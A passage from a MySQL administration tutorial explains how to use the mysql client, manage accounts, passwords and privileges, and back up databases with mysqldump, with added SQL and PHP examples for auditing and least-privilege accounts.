communicates with the MySQL server, it’s a client. When you enter SQL
queries in this client, the response is returned to the client and displayed
onscreen. The monitor program can send queries across a network; it
doesn’t have to be running on the machine where the database is stored.

This client is always installed when MySQL is installed, so it’s always
available. It’s quite simple and quick if you know SQL and can type your
queries without mistakes.

To send SQL queries to MySQL from the mysql client, follow these steps: 

1. Locate the mysql client.

By default, the mysql client program is installed in the subdirectory bin,
under the directory where MySQL is installed. In Unix and Linux, the
default is /usr/local/mysql/bin or /usr/local/bin. In Windows,
the default is c:\Program Files\MySQL\MySQL Server 5.0\bin.
However, the client might be installed in a different directory. Or, if you
aren’t the MySQL administrator, you might not have access to the mysql
client.

If you don’t know where MySQL is installed or can’t run the client, ask
the MySQL administrator to put the client somewhere where you can
run it or to give you a copy that you can put on your own computer.

2. Start the client.

In Unix and Linux, type the path/filename (for example,
/usr/local/mysql/bin/mysql). In Windows, open a command prompt window
and then type the path\filename (for example,
c:\Program Files\MySQL\MySQL Server 5.0\bin\mysql). This command starts the
client if you don’t need to use an account name or a password. If you
need to enter an account or a password or both, use the following
parameters:

• -u user: user is your MySQL account name.

• -p: This parameter prompts you for the password for your MySQL account.

For instance, if you’re in the directory where the mysql client is located,
the command might look like this:

mysql -u root -p

3. If you’re starting the mysql client to access a database across the
network, use the following parameter after the mysql command:

-h host, where host is the name of the machine where MySQL is
located.

For instance, if you’re in the directory where the mysql client is located,
the command might look like this:

mysql -h mysqlhost.mycompany.com -u root -p

Press Enter after typing the command.

4. Enter your password when prompted for it. 

The mysql client starts, and you see something similar to this: 

Welcome to the MySQL monitor. Commands end with ; or \g. 

Your MySQL connection id is 459 to server version: 5.0.15 
Type 'help;' or '\h' for help. Type '\c' to clear the buffer. 
mysql> 

5. Select the database that you want to use. 

At the mysql prompt, type the following: 

use databasename 



Use the name of the database that you want to query. 

Some SQL statements, such as SHOW DATABASES, don’t require that you
select a database. For those statements, you can skip Step 5.

6. At the mysql prompt, type your SQL statement followed by a
semicolon (;) and then press Enter.

If you forget to type the semicolon (;) at the end of the query, the mysql
client doesn’t execute the statement. Instead, it continues to display the
prompt (mysql>) until you enter a semicolon.

The response to the statement is displayed onscreen. 

7. To leave the mysql client, type quit at the prompt and then press Enter. 


You can use the mysql client to send a SQL statement that you type yourself, 
and it returns the response to the statement. 


Protecting Your MySQL Databases

You need to control access to the information in your database. You need to 
decide who can see the data and who can change it. If a bad guy gets a list 
of your customers’ private information (such as credit card numbers), you 
clearly have a problem. You need to guard your data. 

MySQL provides a security system for protecting your data. The system
includes the following: 

♦ MySQL accounts: No one can access the data in your database without 
an account. The account has a name the user must use. The account can 
also have a password that users must provide before they access the 
account. In addition, each account specifies where you can access the 
data from, such as only from the current computer or only from a
specific domain.

♦ Permissions: MySQL uses account permissions to specify who can do 
what. Anyone using a valid account can connect to the MySQL server, 
but he or she can do only those things that are allowed by the
permissions for the account. For example, an account might be set up so that
users can select data but cannot insert or update data. Or, an account
might be set up so that it can change the data in a specific table, but can 
only look at the data in another table. 

You can create and delete accounts, add and change passwords, and add 
and remove permissions with SQL queries. You can send the SQL queries 
with either of the methods described in the preceding section. You can also 
manage your MySQL accounts with features provided by phpMyAdmin. We 
describe administering your MySQL databases in Chapter 2 of this minibook. 

Administering MySQL

In This Chapter

Establishing and controlling access to data
Creating and managing accounts
Backing up and restoring databases
Getting the newest version of MySQL


As discussed previously, MySQL is database management software.
It manages databases that contain the information you need for the
dynamic website that you are building. Your goal is to store data in a
database or retrieve data from the database. You can store and retrieve data
directly (see Chapters 3 and 4 of this minibook) or store and retrieve data
from PHP scripts (see Chapter 5 of this minibook). In addition, a MySQL
administrator is required to ensure that MySQL performs its work correctly
and efficiently.


We describe MySQL administration in this chapter. In the first few sections 
of this chapter, we give you the preliminary information you need to know 
about MySQL administration and how you can control access to your data 
with account names, hostnames, and passwords. Later, we give you specific 
information on how to add accounts and change passwords and privileges. 
Backing up and restoring the database are also important administrative 
tasks, and we tell you how to do that in this chapter as well. Finally, as a 
MySQL administrator, you’ll also need to make sure that you’re using the 
latest version of MySQL, and we discuss that in the final section of this 
chapter. 


Understanding the Administrator Responsibilities 

Administering MySQL encompasses the tasks required to ensure that 
MySQL can perform its data management duties in an efficient and secure 
manner. 

You might be responsible for some or all of the administrative tasks, depending
on how you access MySQL. If you’re using MySQL on a web hosting company’s 
computer, the hosting company performs most or all of the administrative 
tasks. However, if you’re using MySQL on your local computer, you’re the 
administrator, entirely responsible for the administration of MySQL. 

The duties of the administrator include the following:

♦ Install MySQL. Described in Book I, Chapter 4. If MySQL is running on a 
web hosting computer, you’re not responsible for installation. 

♦ Start and shut down the MySQL server. Described in Book I, Chapter 4. 
If MySQL is running on a web hosting computer, you don’t start or stop 
the server. 

♦ Create and maintain MySQL user accounts. No one can access the data 
in your database without an account. Accounts need to be installed and 
removed, passwords added or removed, and privileges assigned to or 
removed from accounts. We describe administering user accounts in the 
section “Setting Up MySQL Accounts,” later in this chapter. 

If you’re using MySQL at a web hosting company, you might or might not 
be allowed to create or alter MySQL accounts. You might be limited to 
one account with defined privileges. 

♦ Back up data. You need to keep backup copies of your data in case 
the data is lost or damaged. If you’re using MySQL at a web hosting 
company, you need to check with that company regarding its backup 
procedures. You might still want to keep your own backup, just in case 
the web hosting company’s backup procedures fail. You can read about 
backup databases in the section “Backing Up Your Database,” later in 
this chapter. 

♦ Update MySQL. Install new MySQL releases when needed. If MySQL is 
running on a web hosting computer, you’re not responsible for updates. 
We talk about upgrading MySQL in the section “Upgrading MySQL,” later 
in this chapter. 


Default Access to Your Data

When MySQL is installed, a default MySQL account named root is installed. 
Sometimes, this account is installed without a password. If you configured 
MySQL on Windows with the Configuration Wizard (as described in Book I, 
Chapter 4), you set a password during the configuration procedure. In
addition, you might have set up an anonymous account with no account name and
no password. If you’re accessing MySQL through a web hosting company, the 
company provides you with the account name and password to use. 



In general, you shouldn’t use the account root without a password. If your 
installation set up a root account without a password, add a password right 
away. The root account is set up with all privileges. You use this account 
for the administration of your MySQL databases. You don’t need an account 
with all privileges to access your MySQL databases, or to add and retrieve 
data. Therefore, in most cases, you want to create an account with fewer 
privileges that you use to access the data from your PHP scripts, and we tell 
you how to do that in this chapter. 

Controlling Access to Your Data

You need to control access to the information in your database. You need 
to decide who can see the data and who can change it. Imagine what would 
happen if your competitors could change the information in your online 
product catalog or copy your list of customers — you’d be out of business in 
no time flat. Clearly, you need to guard your data. 

Fortunately, MySQL provides a security system for protecting your data. No
one can access the data in your database without an account. Each MySQL 
account has the following attributes: 


♦ An account name 

♦ A hostname — the machine from which the account can access the 
MySQL server 

♦ A password 

♦ A set of privileges 


To access your data, someone must use a valid account name and know the 
password associated with that account. In addition, that person must be 
connecting from a computer that’s permitted to connect to your database 
via that specific account. 


After the user is granted access to the database, what he or she can do to 
the data depends on what privileges have been set for the account. Each 
account is either allowed or not allowed to perform an operation in your 
database, such as SELECT, DELETE, INSERT, CREATE, or DROP. (Table 2-1,
later in this chapter, explains those privileges.) The settings that specify 
what an account can do are privileges. You can set up an account with all 
privileges, no privileges, or anything in between. For instance, for an online 
product catalog, you want the customer to be able to see the information in 
the catalog but not change that information. 

When a user attempts to connect to MySQL and execute a statement, MySQL 
controls access to the data in two stages: 

1. Connection verification: MySQL checks the validity of the account name
and password, and checks whether the connection is coming from a host 
that’s allowed to connect to the MySQL server by using the specified 
account. If everything checks out, MySQL accepts the connection. 

2. Request verification: After MySQL accepts the connection, it checks 
whether the account has the necessary privileges to execute the
specified statement. If it does, MySQL executes the statement.

Any statement that you send to MySQL can fail either because the connection
is rejected in the first step or because the statement isn’t permitted in the 
second step. An error message is returned to help you identify the source 
of the problem. 

In the following sections, we describe accounts and privileges in detail. 


Account names and hostnames 

Together, the account name and hostname (the name of the computer 
that’s authorized to connect to the database) identify a unique account. 
Two accounts with the same name but different hostnames can exist and 
can have different passwords and privileges. However, you can’t have two 
accounts with the same name and the same hostname. 


The MySQL server accepts connections from a MySQL account only when
that account is connecting from hostname. When you build the GRANT or
REVOKE statement (which we describe in the section “Changing privileges,”
later in this chapter), you identify the MySQL account by using both the
account name and the hostname in the following format:
accountname@hostname (for instance, root@localhost).



The MySQL account name is completely unrelated in any way to the Unix, 
Linux, or Windows username (also sometimes called the login name). If 
you’re using an administrative MySQL account named root, that account 
is not related to the Unix or Linux root login name. Changing the MySQL 
account name doesn’t affect the Unix, Linux, or Windows login name — and 
vice versa. 


MySQL account names and hostnames have the following characteristics: 

♦ An account name can be up to 16 characters long. You can use special 
characters in account names, such as a space or a hyphen (-). However, 
you can’t use wildcards in the account name. 

♦ An account name can be blank. If an account exists in MySQL with a 
blank account name, any account name is valid for that account. A user 
can use any account name to connect to your database if the user is
connecting from a hostname that’s allowed to connect to the blank account
name and uses the correct password (if a password is required). You
can use an account with a blank name to allow anonymous users to
connect to your database.

♦ The hostname can be a name or an IP address. For example, the
hostname can be a name, such as thor.mycompany.com, or an IP (Internet
protocol) address, such as 192.163.2.33. The machine on which the
MySQL server is installed is localhost. 

♦ The hostname can contain wildcards. You can use a percent sign 
(%) as a wildcard: % matches any hostname. If you add an account for 
george@%, someone who uses the account named george can connect
to the MySQL server from any computer. 

♦ The hostname can be blank. Leaving the hostname blank is the same as 
using % for the hostname. 

You can create an account with both a blank account name and a blank
hostname (or a percent sign — % — for the hostname). Such an account would
allow anyone to connect to the MySQL server by using any account name 
from any computer. But you probably don’t want such an account. This kind 
of an account is sometimes installed when MySQL is installed, but it’s given 
no privileges, so it can’t do anything. 

When MySQL is installed, it automatically installs an account with all privileges: 
root@localhost. Depending on your operating system, this account might 
be installed without a password. Anyone who’s logged in to the computer on 
which MySQL is installed can access MySQL and do anything to it by using 
the account named root. (Of course, root is a well-known account name, so
this account isn’t secure. If you’re the MySQL administrator, add a password 
to this account immediately.) 
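
The two verification stages and the hostname rules described above can be seen working together in the following added example, which is a simplified model and not code from the book or from MySQL. Every function name, account, host and password in it is constructed for illustration; SHA-256 stands in for MySQL's own password handling, and the sample list is assumed to be ordered from most specific to least specific entry.

```php
<?php
// Added example: a simplified model of the two-stage access check this
// chapter describes. Not MySQL's code; all names, hosts and passwords are
// constructed, and SHA-256 stands in for MySQL's own password hashing.

/** % is a wildcard in a hostname; a blank hostname is the same as %. */
function host_matches(string $pattern, string $clientHost): bool
{
    $pattern = ($pattern === '') ? '%' : $pattern;
    $regex = '/^' . str_replace('%', '.*', preg_quote($pattern, '/')) . '$/i';
    return preg_match($regex, $clientHost) === 1;
}

/** Stage 1, connection verification: the matching account, or null. */
function verify_connection(array $accounts, string $user, string $host, string $password): ?array
{
    foreach ($accounts as $account) { // assumed order: most specific first
        $nameOk = ($account['user'] === '' || $account['user'] === $user);
        if ($nameOk && host_matches($account['host'], $host)) {
            // A blank stored password matches only a blank supplied one.
            $supplied = ($password === '') ? '' : hash('sha256', $password);
            return hash_equals($account['password'], $supplied) ? $account : null;
        }
    }
    return null;
}

/** Stage 2, request verification: statement name must be a granted privilege. */
function verify_request(array $account, string $statement): bool
{
    $name = strtoupper((string) strtok($statement, " \t\r\n"));
    return in_array('ALL', $account['privileges'], true)
        || in_array($name, $account['privileges'], true);
}

function check_access(array $accounts, string $user, string $host, string $password, string $statement): string
{
    $account = verify_connection($accounts, $user, $host, $password);
    if ($account === null) {
        return 'rejected at connection verification';
    }
    return verify_request($account, $statement)
        ? "executed as '{$account['user']}'@'{$account['host']}'"
        : 'rejected at request verification';
}

/** Flags the account properties the chapter warns about. */
function audit_account(array $account): array
{
    $findings = [];
    if ($account['user'] === '') {
        $findings[] = 'blank account name: any name is accepted';
    }
    if ($account['host'] === '' || $account['host'] === '%') {
        $findings[] = 'may connect from any computer';
    }
    if ($account['password'] === '') {
        $findings[] = 'no password required';
    }
    if (array_intersect($account['privileges'], ['ALL', 'GRANT', 'FILE', 'SHUTDOWN'])) {
        $findings[] = 'holds administrative privileges';
    }
    return $findings;
}

$accounts = [ // constructed sample data
    ['user' => 'root', 'host' => 'localhost', 'password' => '', 'privileges' => ['ALL']],
    ['user' => 'catalog', 'host' => 'web1.mycompany.com',
     'password' => hash('sha256', 'constructed-pw-1'), 'privileges' => ['SELECT']],
    ['user' => 'george', 'host' => '%',
     'password' => hash('sha256', 'constructed-pw-2'), 'privileges' => ['SELECT', 'INSERT']],
    ['user' => '', 'host' => '', 'password' => '', 'privileges' => ['USAGE']],
];

$attempts = [ // [account name, client host, password, statement]
    ['catalog', 'web1.mycompany.com', 'constructed-pw-1', 'SELECT lastName FROM Member'],
    ['catalog', 'web1.mycompany.com', 'constructed-pw-1', 'DELETE FROM Member'],
    ['catalog', 'laptop.example.net', 'constructed-pw-1', 'SELECT lastName FROM Member'],
    ['george', 'laptop.example.net', 'constructed-pw-2', 'INSERT INTO Member (lastName) VALUES ("Smith")'],
    ['visitor', 'laptop.example.net', '', 'SELECT lastName FROM Member'],
];
foreach ($attempts as [$user, $host, $password, $statement]) {
    printf("%s@%s  %s  =>  %s\n", $user, $host, $statement,
        check_access($accounts, $user, $host, $password, $statement));
}
foreach ($accounts as $account) {
    $findings = implode('; ', audit_account($account)) ?: 'no findings';
    printf("'%s'@'%s': %s\n", $account['user'], $account['host'], $findings);
}
```

The model only handles statements whose name is also a privilege in Table 2-1. In the last attempt the blank account accepts the connection but, holding only USAGE, is stopped at request verification.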

Passwords

A password is set up for every account. If no password is provided for the 
account, the password is blank, which means that no password is required. 
MySQL doesn’t have any limit for the length of a password, but sometimes 
other software on your system limits the length to eight characters. If so, 
any characters after eight are dropped. 

For extra security, MySQL encrypts passwords before it stores them. That 
means passwords aren’t stored in the recognizable characters that you 
enter. This security measure ensures that no one can simply look at the 
stored passwords and understand what they are. 

Unfortunately, some bad people out there might try to access your data by 
guessing your password. They use software that tries to connect rapidly in 
succession with different passwords — a practice called a brute force attack. 

In any event, your MySQL server shouldn’t be exposed directly to the 
Internet, so an attacker would need to get access to the MySQL server first in 
order to try a brute force attack. 

Account privileges

MySQL uses account privileges to specify who can do what. Anyone using a 
valid account can connect to the MySQL server, but he or she can do only 
those things that are allowed by the privileges for the account. For example, 
an account might be set up so that users can select data but can’t insert or 
update data. 

Privileges can be granted for particular databases, tables, or columns. For
instance, an account can allow the user to select data from all the tables in 
the database but insert data into only one table and update only a single 
column in a specific table. 

Table 2-1 lists some privileges that you might want to assign or remove. 
Other privileges are available, but they’re less commonly used. You can find 
a complete list of privileges in the MySQL online manual at 
http://dev.mysql.com/doc/refman/5.6/en/privileges-provided.html. 


Table 2-1    MySQL Account Privileges 

Privilege    Description 
ALL          All privileges 
ALTER        Can alter the structure of tables 
CREATE       Can create new databases or tables 
DELETE       Can delete rows in tables 
DROP         Can drop databases or tables 
FILE         Can read and write files on the server 
GRANT        Can change the privileges on a MySQL account 
INSERT       Can insert new rows into tables 
SELECT       Can read data from tables 
SHUTDOWN     Can shut down the MySQL server 
UPDATE       Can change data in a table 
USAGE        No privileges 



You probably don’t want to grant all because it includes privileges for 
administrative operations, such as shutting down the MySQL server — 
privileges that you don’t want anyone other than yourself to have. 


Setting Up MySQL Accounts 

An account is identified by the account name and the name of the 
computer allowed to access MySQL from this account. When you create a new 
account, you specify it as accountname@hostname. You can specify a 
password when you create an account, or you can add a password later. You can 
also set up privileges when you create an account or add privileges later. 
The MySQL security database 

When MySQL is installed, it automatically creates a database called mysql. 
All the information used to protect your data is stored in this database, 
including account names, hostnames, passwords, and privileges. 

Privileges are stored in columns. The format of each column name is 
privilege_priv, in which privilege is a specific account privilege. For 
instance, the column containing ALTER privileges is named alter_priv. 
The value in each privilege column is Y or N, meaning yes or no. So, for 
instance, in the user table (described in the following list), there would 
be a row for an account and a column for alter_priv. If the account field 
for alter_priv contains Y, the account can be used to execute an alter 
statement. If alter_priv contains N, the account doesn't have privilege to 
execute an alter statement. 

The mysql database contains the following tables that store privileges: 

♦ user table: This table stores privileges that apply to all the databases 
and tables. It contains a row for each valid account that includes the 
columns user name, hostname, and password. The MySQL server rejects a 
connection for an account that doesn't exist in this table. 

♦ db table: This table stores privileges that apply to a particular 
database. It contains a row for the database, which gives privileges to an 
account name and a hostname. The account must exist in the user table for 
the privileges to be granted. Privileges that are given in the user table 
overrule privileges in this table. 

For instance, if the user table has a row for the account designer that 
gives INSERT privileges, designer can insert into all the databases. If a 
row in the db table shows N for insert for the designer account in the 
PetCatalog database, the user table overrules it, and designer can insert 
in the PetCatalog database. 

♦ host table: This table controls access to a database, depending on the 
host. The host table works with the db table. If a row in the db table has 
an empty field for the host, MySQL checks the host table to see whether 
the db has a row there. In this way, you can allow access to a db from 
some hosts but not from others. 

For instance, suppose you have two databases: db1 and db2. The db1 
database has sensitive information, so you want only certain people to see 
it. The db2 database has information that you want everyone to see. If you 
have a row in the db table for db1 with a blank host field, you can have 
two rows for db1 in the host table. One row can give all privileges to 
users connecting from a specific host, whereas another row can deny 
privileges to users connecting from any other host. 

♦ tables_priv table: This table stores privileges that apply to specific 
tables. 

♦ columns_priv table: This table stores privileges that apply to specific 
columns. 

You can see and change the tables in mysql directly if you're using an 
account that has the necessary privileges. You can use SQL queries such as 
select, insert, and update. If you're accessing MySQL through your 
employer, a client, or a web hosting company, you probably don't have an 
account with the necessary privileges. 

All the account information is stored in a database named mysql that’s 
automatically created when MySQL is installed. To add a new account or change 
any account information, you must use an account that has the proper 
privileges on the mysql database. 

In the rest of this section, we describe how to add and delete accounts and 
change passwords and privileges for accounts — and how to refresh 
privileges so that MySQL sees the changes. 

However, if you have an account that you received from your company IT 
department or from a web hosting company, you might receive an error 
when you try to add an account or change account privileges as described in 
this chapter. If your account is restricted from performing any of the 
necessary queries, you need to request an account with more privileges or ask 
the MySQL administrator to add a new account for you or make the changes you 
need. 

Identifying what accounts currently exist 

To see the account information, you can execute an SQL query, using 
the mysql client as described in Chapter 1 of this minibook. To see what 
accounts currently exist for your database, you need an account that has the 
necessary privileges. 

All the account names are stored in a database named mysql in a table 
named user. To see the account information, you can execute the following 
query on a database named mysql: 

SELECT * FROM user 

You should get a list of all the accounts. However, if you’re accessing MySQL 
through your company or a web hosting company, you probably don’t have 
the necessary privileges. In that case, you might get an error message like 
this: 

No Database Selected 

This message means that your account is not allowed to select the mysql 
database. Or you might get an error message saying that you don’t have the 
SELECT privilege. Even though this message is annoying, it’s a sign that the 
company has good security measures in place. However, it also means that 
you can’t see what privileges your account has. You must ask your MySQL 
administrator or try to figure it out yourself by trying queries and seeing 
whether you’re allowed to execute them. 
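
As a narrower alternative to SELECT * FROM user, the queries below (an added example, not part of the original chapter) pick out the rows an administrator should look at first: accounts with a blank password, anonymous or any-host accounts, and accounts holding server-wide administrative privileges. They assume the MySQL 5.0 to 5.6 grant-table layout this chapter describes, with a Password column in mysql.user, and the password shown is a placeholder.

```sql
-- Added example: audit of the grant tables in the mysql database.
-- Assumption: MySQL 5.0-5.6 layout, where the hash is kept in user.Password
-- (MySQL 5.7 and later keep it in authentication_string instead).

-- 1. Accounts that are easy to log in to: blank password, anonymous
--    account name (empty User), or any client host allowed (Host = '%').
SELECT User,
       Host,
       IF(Password = '', 'YES', 'no') AS blank_password,
       IF(User = '',     'YES', 'no') AS anonymous_account,
       IF(Host = '%',    'YES', 'no') AS any_host
  FROM mysql.user
 WHERE Password = '' OR User = '' OR Host = '%'
 ORDER BY User, Host;

-- 2. Accounts whose row in the user table grants administrative privileges
--    from Table 2-1 on every database (FILE, GRANT, SHUTDOWN, DROP).
SELECT User, Host, File_priv, Grant_priv, Shutdown_priv, Drop_priv
  FROM mysql.user
 WHERE 'Y' IN (File_priv, Grant_priv, Shutdown_priv, Drop_priv)
 ORDER BY User, Host;

-- 3. Database-level rows in the db table, to see which accounts can
--    write to or drop which databases.
SELECT User, Host, Db, Insert_priv, Update_priv, Delete_priv, Drop_priv
  FROM mysql.db
 ORDER BY User, Host, Db;

-- 4. Close the gap the chapter warns about: give root@localhost a password,
--    using the SET PASSWORD form shown later in this chapter.
--    The password below is a placeholder; choose your own.
SET PASSWORD FOR 'root'@'localhost' = PASSWORD('replace-with-a-long-random-password');
```

Run these from the mysql client with an account that has SELECT privilege on the mysql database.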
Adding accounts 

The preferred way to access MySQL from PHP is to set up an account 
specifically for this purpose with only the privileges that are needed, and we 
describe in this section how to add accounts. 

If you’re using an account given to you by a company IT department or a 
web hosting company, it might or might not have all the privileges needed to 
create an account. If it doesn’t, you can’t successfully execute the statement 
to add an account, and you have to request a second account to use with PHP. 

If you need to request a second account, get an account with restricted 
privilege (if at all possible) because your web database application is more 
secure if the account your PHP programs use doesn’t have more privileges 
than are necessary. 


To create one or more users when you have the necessary privileges, you 
can use the create user statement (added to MySQL in version 5.0.2), as 
follows: 


CREATE USER accountname@hostname IDENTIFIED BY 'password', 
accountname@hostname IDENTIFIED BY 'password',... 

This statement creates the specified new user account(s) with the specified 
password for each account and no privileges. You don’t need to specify 
a password. If you leave out IDENTIFIED BY 'password', the account 
is created with no password. You can add or change a password for the 
account at a later time. We discuss adding passwords and privileges in the 
sections “Adding and changing passwords” and “Changing privileges,” later 
in this chapter. 

If you’re using a version of MySQL before 5.0.2, you must use a grant 
statement to create an account. We describe the grant statement in the 
“Changing privileges” section, later in this chapter. 


Adding and changing passwords 

Passwords aren’t set in stone. You can add or change a password for an 
existing account. Like any of the procedures in this section, you can add or 
change passwords with an SQL statement, like this: 

SET PASSWORD FOR username@hostname = PASSWORD('password') 

The password for the account username@hostname is set to password. If the 
account currently has a password, the password is changed. You don’t need 
to specify the FOR clause. If you don’t, the password is set for the account 
you’re currently using. 

You can remove a password by sending the SET PASSWORD statement with 
an empty password: 

SET PASSWORD FOR username@hostname = PASSWORD('') 



When you make changes to passwords, you need to refresh the privileges 
so that MySQL sees the change. This is accomplished with the FLUSH 
PRIVILEGES statement: 

FLUSH PRIVILEGES 


Changing privileges 

Each account has a set of privileges that specifies what the user of the 
account can and can’t do. You can set the privileges when you create an 
account, but you can also change the privileges of an account at any time. 
The most useful privileges that you can set for an account are shown earlier 
in the chapter, in Table 2-1. 

You can see the current privileges for an account by sending the following 
statement: 

SHOW GRANTS FOR accountname@hostname 

The output is a grant statement that would create the current account. The 
output shows all the current privileges. If you don’t include the FOR clause, 
you see the current privileges for the account that issued the SHOW GRANTS 
query. 


You can change privileges for an account with the grant statement, which 
has the following general format: 



GRANT privilege (columns) ON tablename 
TO accountname@hostname IDENTIFIED BY 'password' 

Like other privilege-related changes, you need to refresh the privileges after 
making changes using FLUSH PRIVILEGES. 

You can also create a new account or change a password with the grant 
statement. You need to fill in the following information: 


♦ privilege (columns): You must list at least one privilege. You can 
limit each privilege to one or more columns by listing the column name 
in parentheses following the privilege. If you don’t list a column name, 
the privilege is granted on all columns in the table(s). You can list as 
many privileges and columns as needed, separated by commas. You 
can see the possible privileges listed in Table 2-1. For instance, a grant 
statement might start with this: 

grant select (firstName,lastName), update, 
insert (birthdate) . . . 
♦ tablename: The name (or names) of the table(s) on which the privilege 
is granted. You need to include at least one table. You can list several 
tables, separated by commas. The possible values for tablename are 

• tablename: The entire table named tablename in the current 
database. You can use an asterisk (*) to mean all tables in the current 
database. If you use an asterisk and no current database is selected, 
the privilege is granted to all tables on all databases. 

• databasename.tablename: The entire table named tablename in 
databasename. You can use an asterisk (*) for either the database 
name or the table name to mean all databases or tables. Using *.* 
grants the privilege on all tables in all databases. 

♦ accountname@hostname: If the account already exists, it’s given the 
indicated privileges. If the account doesn’t exist, it’s added. The account 
is identified by the accountname and the hostname as a pair. If an 
account exists with the specified account name but a different 
hostname, the existing account isn’t changed; a new one is created. 

♦ password: The password that you’re adding or changing. A password 
isn’t required. If you don’t want to add or change a password for this 
account, leave out the phrase IDENTIFIED BY 'password'. 

For example, the grant statement that adds a new account for use in the PHP 
scripts for an online catalog database named ProductCatalog might be 

GRANT select ON ProductCatalog.* TO phpuser@localhost 
IDENTIFIED BY 'A41!14a!' 

To remove privileges, use the revoke statement. The general format is 

REVOKE privilege (columns) ON tablename 
FROM accountname@hostname 

You need to fill in the appropriate information. 

You can remove all the privileges for an account with the following revoke 
statement: 

REVOKE all ON *.* FROM accountname@hostname 
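
The statements below are an added example, not taken from the book, that build the least-privilege PHP account described in this section and then look at where each grant is recorded in the mysql database tables covered in the sidebar. ProductCatalog and phpuser@localhost come from the chapter; the Product table, its columns, and the password are placeholders invented for the illustration.

```sql
-- Added example: a least-privilege account for PHP scripts.
-- Hypothetical names: table Product, columns productID/productName/price.
-- The password is a placeholder.

-- A table must exist before privileges on it or its columns can be granted.
CREATE DATABASE IF NOT EXISTS ProductCatalog;
CREATE TABLE IF NOT EXISTS ProductCatalog.Product (
    productID   INT UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY,
    productName VARCHAR(100) NOT NULL,
    price       DECIMAL(8,2) NOT NULL
);

-- CREATE USER on its own gives the account no privileges.
CREATE USER 'phpuser'@'localhost'
    IDENTIFIED BY 'replace-with-a-long-random-password';

-- Database level: read every table in ProductCatalog, nothing elsewhere.
GRANT SELECT ON ProductCatalog.* TO 'phpuser'@'localhost';

-- Column level: the scripts may change price but no other column.
GRANT UPDATE (price) ON ProductCatalog.Product TO 'phpuser'@'localhost';

-- Review the account's privileges as GRANT statements.
SHOW GRANTS FOR 'phpuser'@'localhost';

-- The same privileges as rows in the grant tables.
-- Global privileges (user table):
SELECT Select_priv, Insert_priv, Update_priv, Delete_priv, Drop_priv
  FROM mysql.user
 WHERE User = 'phpuser' AND Host = 'localhost';

-- Database-level privileges (db table):
SELECT Db, Select_priv, Insert_priv, Update_priv
  FROM mysql.db
 WHERE User = 'phpuser' AND Host = 'localhost';

-- Column-level privileges (columns_priv table):
SELECT Db, Table_name, Column_name, Column_priv
  FROM mysql.columns_priv
 WHERE User = 'phpuser' AND Host = 'localhost';

-- Take the column privilege back when the scripts no longer need it,
-- then confirm what is left.
REVOKE UPDATE (price) ON ProductCatalog.Product FROM 'phpuser'@'localhost';
SHOW GRANTS FOR 'phpuser'@'localhost';
```
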

Removing accounts 

You might want to remove an account. In most cases, having an account 
that no one uses doesn’t have any negative effects. However, if you think an 
account has been compromised, you might want to remove it for security 
reasons. 
To remove an account, you can use the drop user statement (which was 
added in MySQL 4.1.1), as follows: 

DROP USER accountname@hostname, accountname@hostname, ... 

You must use an account that has delete privileges on the mysql database 
to execute the drop user statement. 



The behavior of drop user has changed through MySQL versions. As of 
MySQL 5.0.2, it removes the account and all records related to the account, 
including records that give the account privileges on specific databases or 
tables. However, in versions before MySQL 5.0.2, drop user drops only 
accounts that have no privileges. Therefore, in older versions, you must 
remove all the privileges from an account, including database or table 
privileges, before you can drop that account. 


Backing Up Your Database 



You need to have at least one backup copy of your valuable database. 
Disasters occur rarely, but they do occur. The computer where your 
database is stored can break down and lose your data, the computer file can 
become corrupted, the building can burn down, and so on. Backup copies of 
your database guard against data loss from such disasters. 

You should have at least one backup copy of your database stored in a 
location that’s separate from the copy you currently use. You should probably 
have more than one copy — perhaps as many as three. 

Here’s how you can store your copies: 


♦ First copy: Store one copy in a handy location, perhaps even on the 
same computer on which you store your database, to quickly replace a 
working database that becomes damaged. 

♦ Second copy: Store a second copy on another computer in case the 
computer on which you have your database breaks down, making the 
first backup copy unavailable. 

♦ Third copy: Store a third copy in a different physical location to prepare 
for the remote chance that the building burns down. If you store the 
second backup copy on a computer at another physical location, you 
don’t need this third copy. 



If you don’t have access to a computer offsite on which you can back up 
your database, you can copy your backup to a portable medium, such as a 
CD or DVD, and store it offsite. Certain companies will store your computer 
media at their location for a fee, or you can just put the media in your pocket 
and take it home. 
If you use MySQL on someone else’s computer, such as the computer of a 
web hosting company, the people who provide your access are responsible 
for backups. They should have automated procedures in place that make 
backups of your database. When evaluating a web hosting company, ask 
about the backup procedures. You want to know how often backup copies 
are made and where they’re stored. If you’re not confident that your data is 
safe, you can discuss changes or additions to the backup procedures. 

If you’re the MySQL administrator, you’re responsible for making backups. 
Even if you’re using MySQL on someone else’s computer, you might want to 
make your own backup copy, just to be safe. 

Make backups at certain times — at least once per day. If your database 
changes frequently, you might want to back up more often. For example, 
you might want to back up to the backup directory hourly but back up to 
another computer once a day. 
You can back up your MySQL database by using a utility program called 
mysqldump, provided by MySQL. The mysqldump program creates a text 
file that contains all the SQL statements you need to re-create your entire 
database. The file contains the CREATE statements for each table and 
INSERT statements for each row of data in the tables. You can restore your 
database, either to its current location or on another computer, by executing 
this set of MySQL statements. 


Backing up on Windows 

To make a backup copy of your database in Windows, follow these steps: 

1. Open a command prompt window. 

For instance, choose Start > All Programs > Accessories > Command Prompt. 

2. Change to the bin subdirectory in the directory where MySQL is 
installed. 

For instance, type cd c:\Program Files\MySQL\MySQL Server 5.0\bin 
into the command prompt. 

3. Type the following: 

mysqldump --user=accountname --password=password 
databasename >path\backupfilename 

Backing up on Linux, Unix, and Mac 

Follow these steps to make a backup copy of your database in Linux, in Unix, 
or on a Mac: 

1. Change to the bin subdirectory in the directory in which MySQL is 
installed. 

For instance, type cd /usr/local/mysql/bin. 
2. Type the following: 

mysqldump --user=accountname --password=password 
databasename >path/backupfilename 

In the preceding code, make the following substitutions: 

• accountname: Replace with the name of the MySQL account that 
you’re using to back up the database. 

• password: Use the password for the account. 

• databasename: Use the name of the database that you want to back 
up. 

• path/backupfilename: Replace path with the directory in which 
you want to store the backups and backupfilename with the name 
of the file in which you want to store the SQL output. 

The account that you use needs to have select privilege. If the account 
doesn’t require a password, you can leave out the entire password 
option. 

You can type the command on one line without pressing Enter. Or you 
can type a backslash (\), press Enter, and continue the command on 
another line. 


For example, to back up the PetCatalog database, you might use the 
command 


mysqldump --user=root --password=secret PetCatalog \ 
>/usr/local/mysql/backups/PetCatalogBackup 



Note: With Linux or Unix, the account that you’re logged in to must have 
privilege to write a file into the backup directory. 

You must type the mysqldump command on one line without pressing 
Enter. 

